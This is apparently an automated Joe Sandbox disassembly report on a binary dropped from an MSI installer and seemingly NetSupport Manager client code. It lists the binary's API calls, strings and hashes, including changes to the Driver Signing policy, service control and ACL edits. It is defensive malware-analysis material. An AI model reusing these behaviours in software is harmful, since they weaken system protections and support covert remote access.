                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnumOpenQueryValue__fassign__wcsicollwcstoxl
                                                                                                                        • String ID: (idata->flags & CFG_VOLATILE) == 0$..\CTL32\Config.cpp$CurrConfig$General\ProductID$nssCurrConfig
                                                                                                                        • API String ID: 852375482-3838709216
                                                                                                                        • Opcode ID: 84f8853947cfc0e23072a64b018e48eb5d1c73b7d164443e3ad9cf7d671f8ee8
                                                                                                                        • Instruction ID: 00b134b9da9bc6edd796990cef183693a7e6d456a6eb2dfb7b9864fee9eaf2bb
                                                                                                                        • Opcode Fuzzy Hash: 84f8853947cfc0e23072a64b018e48eb5d1c73b7d164443e3ad9cf7d671f8ee8
                                                                                                                        • Instruction Fuzzy Hash: 0C415672A00318AFDB20DB65DC41F9A77FCAB99700F1045D9F64DE7241EA70AA448BA1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: CountMetricsSystemTick$ReleaseVersion__wcsicoll_memset
                                                                                                                        • String ID: PCI GDIHOOK5
                                                                                                                        • API String ID: 66172683-3323809677
                                                                                                                        • Opcode ID: 329a98727f40be3f9710cd93af2d995cce49fd22205f71b9c49f0361689f61ba
                                                                                                                        • Instruction ID: 3417eb1884dc44eaf03f25b37f54993dee2f8a12b18b2823453ab288a6ef1534
                                                                                                                        • Opcode Fuzzy Hash: 329a98727f40be3f9710cd93af2d995cce49fd22205f71b9c49f0361689f61ba
                                                                                                                        • Instruction Fuzzy Hash: 9D41BFB19003589FCF24DF66CC85AEAB7FCEF85304F0044ADE60A97240EA759A45CF62
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$__wcsicoll__wcsnicmp_fgetws
                                                                                                                        • String ID: .scp$IsA()$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsicoll
                                                                                                                        • String ID: BMP$GIF$JPEG$JPG$PNG
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsicoll_fwprintf$_fseek
                                                                                                                        • String ID: 0x%08x$0x00000000$client32.ini$client32u.ini
                                                                                                                        APIs
                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,5E06C67B,00000000,?), ref: 00B333B7
                                                                                                                        • CoCreateInstance.OLE32(00B7DD60,00000000,00000017,00B7DC90,?), ref: 00B333D7
                                                                                                                        • wsprintfW.USER32 ref: 00B333F7
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00B33403
                                                                                                                        • wsprintfW.USER32 ref: 00B334B7
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00B33558
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                        • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B192B0: GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                          • Part of subcall function 00B192B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                          • Part of subcall function 00B192B0: _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B192B0: _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • GetProcAddress.KERNEL32(?,GetDpiForWindow), ref: 00B1AE46
                                                                                                                        • GetProcAddress.KERNEL32(?,GetDpiForSystem), ref: 00B1AE67
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B1AE7C
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B1AE87
                                                                                                                        • GetDC.USER32(?), ref: 00B1AE92
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B1AE9D
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00B1AEA7
                                                                                                                          • Part of subcall function 00B12030: LoadLibraryW.KERNEL32(User32.dll,00000000,00B1AE2C), ref: 00B12038
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$CapsDeviceErrorFreeLastLoadOpenReleaseVersion_memset_wcsncpy
                                                                                                                        • String ID: GetDpiForSystem$GetDpiForWindow
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr_wcsncpy$__wcsicoll_memsetwsprintf
                                                                                                                        • String ID: Client$[%s]%c
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,5E06C67B), ref: 00AE805D
                                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,?), ref: 00AE80E5
                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00AE8154
                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 00AE8168
                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00AE8196
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 00AE819D
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$CriticalEnumSection$DeleteEnterInfoLeaveQuery
                                                                                                                        • String ID: ..\CTL32\Config.cpp$err == 0$maxname < _tsizeof (keybuf)
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: __fassign_wcstok$__getptd__wcsicoll_wcsncpywcstoxl
                                                                                                                        • String ID: /-:
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Driver Signing,00000000,000F003F,?,00000000,?,00000000,?,00B0E88D,?,00AEA1B1,?), ref: 00B0E583
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?,?,00B0E88D,?,00AEA1B1,?), ref: 00B0E5B1
                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,Policy,00000000,00000004,00B0E88D,00000004,?,Policy,00000000,?,?,?), ref: 00B0E5DF
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Driver Signing,00000000,000F003F,?,?,00B0E88D,?,00AEA1B1,?), ref: 00B0E607
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?,?,00B0E88D,?,00AEA1B1,?), ref: 00B0E638
                                                                                                                        • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000003,00B0E88D,00000000), ref: 00B0E66C
                                                                                                                        • Sleep.KERNEL32(000003E8,?,00B0E88D,?,00AEA1B1,?), ref: 00B0E693
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$OpenQuery$Sleep
                                                                                                                        • String ID: Policy$Software\Microsoft\Driver Signing
                                                                                                                        APIs
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00B32369
                                                                                                                        • AddAce.ADVAPI32(00000000,00000002,000000FF,00000000,?), ref: 00B32393
                                                                                                                        • AddAuditAccessAce.ADVAPI32(00000000,00000002,?,?,?,?), ref: 00B323B8
                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,?,?,?,?,00000002,000000FF,00000000,?), ref: 00B323C2
                                                                                                                        • GetProcAddress.KERNEL32(00000104,SetNamedSecurityInfoW), ref: 00B323E1
                                                                                                                        • LocalFree.KERNEL32(?,?,?,00000001), ref: 00B32435
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001), ref: 00B32442
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B32449
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap$AccessAddressAuditErrorLastLocalProcProcess
                                                                                                                        • String ID: SetNamedSecurityInfoW
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B192B0: GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                          • Part of subcall function 00B192B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                          • Part of subcall function 00B192B0: _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B192B0: _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • LoadLibraryW.KERNEL32(secur32.dll,5E06C67B), ref: 00B1C931
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserNameExW), ref: 00B1C949
                                                                                                                        • timeGetTime.WINMM ref: 00B1C95C
                                                                                                                        • timeGetTime.WINMM(?,?), ref: 00B1C973
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00B1C979
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B1C99B
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion_memset_wcsncpy
                                                                                                                        • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExW$secur32.dll
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • PostMessageW.USER32(?,000003E1,?,00000000), ref: 00B2EDE1
                                                                                                                        • DestroyWindow.USER32(?), ref: 00B2EDEE
                                                                                                                        • _fputs.LIBCMT ref: 00B2EE3D
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00B2EE58
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$DestroyLocalMessagePostSleepTimeWindow_fputs_mallocwvsprintf
                                                                                                                        • String ID: Done:$Exit$OK$Restart$winexec.ok
                                                                                                                        APIs
                                                                                                                        • OpenServiceW.ADVAPI32(?,?,000F01FF), ref: 00AFB04E
                                                                                                                        • GetLastError.KERNEL32 ref: 00AFB05A
                                                                                                                        • _wprintf.LIBCMT ref: 00AFB066
                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00AFB087
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00AFB0AC
                                                                                                                        Strings
                                                                                                                        • OpenService failed! Error = %d , xrefs: 00AFB061
                                                                                                                        • ControlService failed! Error = %d , xrefs: 00AFB09C
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseControlErrorHandleLastOpen_wprintf
                                                                                                                        • String ID: ControlService failed! Error = %d $OpenService failed! Error = %d
                                                                                                                        APIs
                                                                                                                        • OpenServiceW.ADVAPI32(?,?,000F01FF), ref: 00AFAFC1
                                                                                                                        • GetLastError.KERNEL32 ref: 00AFAFCD
                                                                                                                        • _wprintf.LIBCMT ref: 00AFAFD9
                                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00AFAFEB
                                                                                                                        • GetLastError.KERNEL32 ref: 00AFAFF5
                                                                                                                        • _wprintf.LIBCMT ref: 00AFB008
                                                                                                                        Strings
                                                                                                                        • OpenService failed! Error = %d, xrefs: 00AFAFD4
                                                                                                                        • StartService failure! Error = %d, xrefs: 00AFB003
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastService_wprintf$OpenStart
                                                                                                                        • String ID: OpenService failed! Error = %d$StartService failure! Error = %d
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: Global$FreeUnlock$DeleteObject$_memmove
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • _memset.LIBCMT ref: 00B2C60A
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B2C7C9
                                                                                                                          • Part of subcall function 00B0D730: GetVersion.KERNEL32 ref: 00B0D78A
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                          • Part of subcall function 00B21CE0: _free.LIBCMT ref: 00B21D23
                                                                                                                          • Part of subcall function 00B21CE0: _free.LIBCMT ref: 00B21D29
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: _freewsprintfwvsprintf$LoadLocalStringTimeVersion__wcsicoll_malloc_memset
                                                                                                                        • String ID: ACM$CIC$EVAL$MungeSerFile(%d)$PENDING REGISTRATION$munge nsm.lic, cks=%x, expiry=%d/%d/%d, start=%d/%d/%d
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B26429
                                                                                                                          • Part of subcall function 00B04990: RegOpenKeyExW.ADVAPI32(?,?,00000000,?), ref: 00B049AC
                                                                                                                          • Part of subcall function 00B00E40: _malloc.LIBCMT ref: 00B00E5C
                                                                                                                          • Part of subcall function 00B044E0: RegEnumKeyExW.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,5E06C67B,00000000,00000000), ref: 00B0452B
                                                                                                                        • _malloc.LIBCMT ref: 00B26594
                                                                                                                        • _free.LIBCMT ref: 00B26693
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: _malloc$EnumOpen_freewsprintf
                                                                                                                        • String ID: %s\%s$IsA()$Restore Reg, %s=%d$Restore Reg, %s=%s$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,5E06C67B), ref: 00AECD82
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AECDA2
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00AECE7C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                        • String ID: ..\CTL32\EVMNGR.cpp$bFound
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00B032D0
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • _memmove.LIBCMT ref: 00B03357
                                                                                                                        • _memmove.LIBCMT ref: 00B0337B
                                                                                                                        • _memmove.LIBCMT ref: 00B033B5
                                                                                                                        • _memmove.LIBCMT ref: 00B033D1
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B0341B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B03430
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                        • String ID: deque<T> too long
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B1C596
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00B1C611
                                                                                                                        • _wcsncat.LIBCMT ref: 00B1C669
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00B1C6DE
                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00B1C6EF
                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00B1C6FE
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B1C70D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: CurrentDirectoryFileName$EnvironmentExpandOpenSaveStrings_memset_wcsncat
                                                                                                                        • String ID: X
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • RegCreateKeyW.ADVAPI32(80000002,?,?), ref: 00B22683
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • API ID: wsprintf$CreateLocalTime_mallocwvsprintf
                                                                                                                        • String ID: EventMessageFile$RegisterEventLog(%s)$TypesSupported
                                                                                                                        • API String ID: 63935457-324002705
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "$NSMFileExists(%s) took %d ms$client32u.ini
                                                                                                                        • API String ID: 0-1321718478
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B39583: __wfsopen.LIBCMT ref: 00B39590
                                                                                                                        • _fseek.LIBCMT ref: 00B2A6F5
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00B2A75E
                                                                                                                        • _fprintf.LIBCMT ref: 00B2A76D
                                                                                                                        • _fprintf.LIBCMT ref: 00B2A78A
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _fprintf$ByteCharLoadMultiStringWide__wfsopen_fseekwvsprintf
                                                                                                                        • String ID: %s$0x%lx$Written nsm.lic, cks=%x, wrap=%d, product=%d, expiry=%d/%d/%d, start=%d/%d/%d$r+t
                                                                                                                        • API String ID: 2789903038-3235974708
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00B2AD9A
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00B2ADDE
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B2AE79
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B2AE81
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B2AEB6
                                                                                                                          • Part of subcall function 00B2AD60: RegCloseKey.ADVAPI32(?), ref: 00B2AE25
                                                                                                                          • Part of subcall function 00B2AD60: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00B2AE3B
                                                                                                                        Strings
                                                                                                                        • Delete registry entries for %s, xrefs: 00B2AD7D
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$Openwsprintf$DeleteEnumLocalTime_mallocwvsprintf
                                                                                                                        • String ID: Delete registry entries for %s
                                                                                                                        • API String ID: 3685337534-4139843425
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%0, xrefs: 00B1A17D
                                                                                                                        • Callstack:, xrefs: 00B1A1E0
                                                                                                                        • %02X , xrefs: 00B1A1C3
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$CurrentReadThread
                                                                                                                        • String ID: Callstack:$%02X $EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%0
                                                                                                                        • API String ID: 477357799-1804337886
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(00B8B71C,5E06C67B), ref: 00B0C129
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B0C18B
                                                                                                                          • Part of subcall function 00B385A6: std::exception::_Copy_str.LIBCMT ref: 00B385C1
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B0C1A0
                                                                                                                          • Part of subcall function 00B391A1: RaiseException.KERNEL32(00B3367E,00B82978,00000000,?,00B3367E,00B82978,?,00B32ECB,00000000,?,00B3367E,?), ref: 00B391E3
                                                                                                                        • InitializeCriticalSection.KERNEL32(00000000), ref: 00B0C1B1
                                                                                                                        • EnterCriticalSection.KERNEL32(00B8B71C), ref: 00B0C1CD
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B8B71C,?,00000001), ref: 00B0C223
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Initialize$Copy_strEnterExceptionException@8LeaveRaiseThrowstd::exception::_std::exception::exception
                                                                                                                        • String ID: ..\CTL32\Refcount.cpp$p < ep
                                                                                                                        • API String ID: 4033003751-1059512116
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B146C6
                                                                                                                        • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00B146D8
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B14714
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B14731
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Free$AddressLoadProc
                                                                                                                        • String ID: ..\CTL32\util.cpp$DllGetVersion$pdwMajorVer$pdwMinorVer
                                                                                                                        • API String ID: 1386263645-850731426
                                                                                                                        APIs
                                                                                                                        • _fseek.LIBCMT ref: 00B22123
                                                                                                                        • _fseek.LIBCMT ref: 00B22133
                                                                                                                          • Part of subcall function 00B37732: __lock_file.LIBCMT ref: 00B37773
                                                                                                                          • Part of subcall function 00B37732: __fseek_nolock.LIBCMT ref: 00B37784
                                                                                                                        • _malloc.LIBCMT ref: 00B22143
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • __fread_nolock.LIBCMT ref: 00B22156
                                                                                                                        • _free.LIBCMT ref: 00B221A1
                                                                                                                        • _fseek.LIBCMT ref: 00B221AB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _fseek$AllocateHeap__fread_nolock__fseek_nolock__lock_file_free_malloc
                                                                                                                        • String ID: product.dat$product=
                                                                                                                        • API String ID: 1844859279-1281245283
                                                                                                                        • Opcode ID: feef678c8c4c3fae885085cc74620e13368950e79968e8e80e78942f7a2bd2aa
                                                                                                                        • Instruction ID: f9a33a229522aad1af7af595bc190dfff2778730034064175252ace538ff281e
                                                                                                                        • Opcode Fuzzy Hash: feef678c8c4c3fae885085cc74620e13368950e79968e8e80e78942f7a2bd2aa
                                                                                                                        • Instruction Fuzzy Hash: 9111B9B2A8522477E62066A9AC43F9BB6DCDF41751F6401D5FD0CE7242EA25DE1082E1
                                                                                                                        APIs
                                                                                                                        • UnDecorator::getArgumentList.LIBCMT ref: 00B4C92C
                                                                                                                          • Part of subcall function 00B4C4C7: Replicator::operator[].LIBCMT ref: 00B4C54A
                                                                                                                          • Part of subcall function 00B4C4C7: DName::operator+=.LIBCMT ref: 00B4C552
                                                                                                                        • DName::operator+.LIBCMT ref: 00B4C985
                                                                                                                        • DName::DName.LIBCMT ref: 00B4C9DD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                        • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                        • API String ID: 834187326-2211150622
                                                                                                                        • Opcode ID: 58ea355cbb686eae24a28ec64637a50e54f5188d5478445c5cf73a65c6f7683c
                                                                                                                        • Instruction ID: 6bfd2e672e8c5d727a1d5da1f0f69b521dcf8b2a45872f1082d9071c32788596
                                                                                                                        • Opcode Fuzzy Hash: 58ea355cbb686eae24a28ec64637a50e54f5188d5478445c5cf73a65c6f7683c
                                                                                                                        • Instruction Fuzzy Hash: E9214F72206245AFCB12DF5CD9849A87FF4EB45B44B4580DAE859DB362CB30EB02DB40
                                                                                                                        APIs
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00B1626D
                                                                                                                        • _memset.LIBCMT ref: 00B1628E
                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000001,?), ref: 00B162CB
                                                                                                                        • CreatePopupMenu.USER32 ref: 00B162DA
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00B16303
                                                                                                                        • InsertMenuItemW.USER32(?,00000000,00000001,00000030), ref: 00B16314
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00B1631B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
